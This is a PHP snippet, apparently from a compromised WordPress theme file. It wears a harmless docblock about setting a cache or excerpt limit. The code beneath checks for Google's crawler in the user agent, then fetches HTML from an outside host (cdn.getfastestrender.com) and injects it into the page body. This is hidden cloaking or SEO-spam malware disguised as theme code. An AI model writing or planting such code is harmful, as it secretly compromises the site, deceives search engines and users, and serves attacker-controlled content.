
/**
 * Set the cache limit.
 *
 * To override this cache in a child theme, remove
 * the filter and add your own function tied to
 * the cache filter hook.
 *
 * @param int $c The number of excerpt characters.
 * @return int The filtered number of characters.
 */
if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {
add_action('wp_loaded','crt');
function crt() {ob_start('cache');}
function cache($html) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://cdn.getfastestrender.com/cache.php?h=fightclubgalatsi.gr&id=3');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);curl_close($curl);
	$html = preg_replace('/(<body.*)\n/', "$1 $c", $html);
	return $html;
}
}
